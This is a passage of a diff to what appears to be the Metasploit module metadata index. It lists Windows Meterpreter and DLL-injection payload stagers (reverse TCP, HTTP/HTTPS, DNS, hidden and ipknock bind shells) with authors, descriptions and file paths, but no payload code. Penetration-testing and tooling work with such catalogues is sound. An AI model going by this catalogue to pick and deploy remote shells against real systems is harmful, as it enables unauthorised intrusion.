"arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_windows/meterpreter/reverse_tcp_dns": { + "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)", + "fullname": "payload/windows/meterpreter/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "RageLtMan" + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_windows/meterpreter/reverse_tcp_rc4": { + "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/meterpreter/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "RageLtMan" + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_windows/meterpreter/reverse_tcp_rc4_dns": { + "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/windows/meterpreter/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "RageLtMan" + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_windows/meterpreter/reverse_tcp_uuid": { + "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support", + "fullname": "payload/windows/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker with UUID Support", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_windows/meterpreter/reverse_winhttp": { + "name": "Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp)", + "fullname": "payload/windows/meterpreter/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "Borja Merino " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_winhttp" + }, + "payload_windows/meterpreter/reverse_winhttps": { + "name": "Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp)", + "fullname": "payload/windows/meterpreter/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "Borja Merino " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTPS (Windows winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_winhttps.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_winhttps" + }, + "payload_windows/meterpreter_bind_named_pipe": { + "name": "Windows Meterpreter Shell, Bind Named Pipe Inline", + "fullname": "payload/windows/meterpreter_bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "UserExistsError", + "sf ", + "OJ Reeves" + ], + "description": "Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter_bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/meterpreter_bind_tcp": { + "name": "Windows Meterpreter Shell, Bind TCP Inline", + "fullname": "payload/windows/meterpreter_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "OJ Reeves", + "sf " + ], + "description": "Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/meterpreter_bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/meterpreter_reverse_http": { + "name": "Windows Meterpreter Shell, Reverse HTTP Inline", + "fullname": "payload/windows/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "OJ Reeves", + "sf " + ], + "description": "Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/meterpreter_reverse_https": { + "name": "Windows Meterpreter Shell, Reverse HTTPS Inline", + "fullname": "payload/windows/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "OJ Reeves", + "sf " + ], + "description": "Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/meterpreter_reverse_ipv6_tcp": { + "name": "Windows Meterpreter Shell, Reverse TCP Inline (IPv6)", + "fullname": "payload/windows/meterpreter_reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "OJ Reeves", + "sf " + ], + "description": "Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter_reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/meterpreter_reverse_tcp": { + "name": "Windows Meterpreter Shell, Reverse TCP Inline", + "fullname": "payload/windows/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "OJ Reeves", + "sf " + ], + "description": "Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/metsvc_bind_tcp": { + "name": "Windows Meterpreter Service, Bind TCP", + "fullname": "payload/windows/metsvc_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Stub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/metsvc_bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/metsvc_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/metsvc_reverse_tcp": { + "name": "Windows Meterpreter Service, Reverse TCP Inline", + "fullname": "payload/windows/metsvc_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Stub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/metsvc_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/metsvc_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/patchupdllinject/bind_hidden_ipknock_tcp": { + "name": "Windows Inject DLL, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/windows/patchupdllinject/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "sf ", + "Borja Merino " + ], + "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_windows/patchupdllinject/bind_hidden_tcp": { + "name": "Windows Inject DLL, Hidden Bind TCP Stager", + "fullname": "payload/windows/patchupdllinject/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "sf ", + "Borja Merino " + ], + "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_windows/patchupdllinject/bind_ipv6_tcp": { + "name": "Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/windows/patchupdllinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "sf " + ], + "description": "Inject a custom DLL into the exploited process.\n\nListen for an IPv6 connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_windows/patchupdllinject/bind_ipv6_tcp_uuid": { + "name": "Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/patchupdllinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "sf ", + "OJ Reeves" + ], + "description": "Inject a custom DLL into the exploited process.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_windows/patchupdllinject/bind_named_pipe": { + "name": "Windows Inject DLL, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/windows/patchupdllinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "UserExistsError" + ], + "description": "Inject a custom DLL into the exploited process.\n\nListen for a pipe connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_windows/patchupdllinject/bind_nonx_tcp": { + "name": "Windows Inject DLL, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/windows/patchupdllinject/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "vlad902 " + ], + "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection (No NX)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_windows/patchupdllinject/bind_tcp": { + "name": "Windows Inject DLL, Bind TCP Stager (Windows x86)", + "fullname": "payload/windows/patchupdllinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "sf " + ], + "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_tcp" + }, + "payload_windows/patchupdllinject/bind_tcp_rc4": { + "name": "Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/patchupdllinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_windows/patchupdllinject/bind_tcp_uuid": { + "name": "Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/patchupdllinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "OJ Reeves" + ], + "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_windows/patchupdllinject/find_tag": { + "name": "Windows Inject DLL, Find Tag Ordinal Stager", + "fullname": "payload/windows/patchupdllinject/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape " + ], + "description": "Inject a custom DLL into the exploited process.\n\nUse an established connection", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/findtag_ord.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/findtag_ord" + }, + "payload_windows/patchupdllinject/reverse_ipv6_tcp": { + "name": "Windows Inject DLL, Reverse TCP Stager (IPv6)", + "fullname": "payload/windows/patchupdllinject/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "sf " + ], + "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker over IPv6", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_windows/patchupdllinject/reverse_nonx_tcp": { + "name": "Windows Inject DLL, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/windows/patchupdllinject/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "vlad902 " + ], + "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker (No NX)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_windows/patchupdllinject/reverse_ord_tcp": { + "name": "Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/windows/patchupdllinject/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "spoonm " + ], + "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_windows/patchupdllinject/reverse_tcp": { + "name": "Windows Inject DLL, Reverse TCP Stager", + "fullname": "payload/windows/patchupdllinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "sf " + ], + "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_tcp" + }, + "payload_windows/patchupdllinject/reverse_tcp_allports": { + "name": "Windows Inject DLL, Reverse All-Port TCP Stager", + "fullname": "payload/windows/patchupdllinject/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "sf " + ], + "description": "Inject a custom DLL into the exploited process.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_windows/patchupdllinject/reverse_tcp_dns": { + "name": "Windows Inject DLL, Reverse TCP 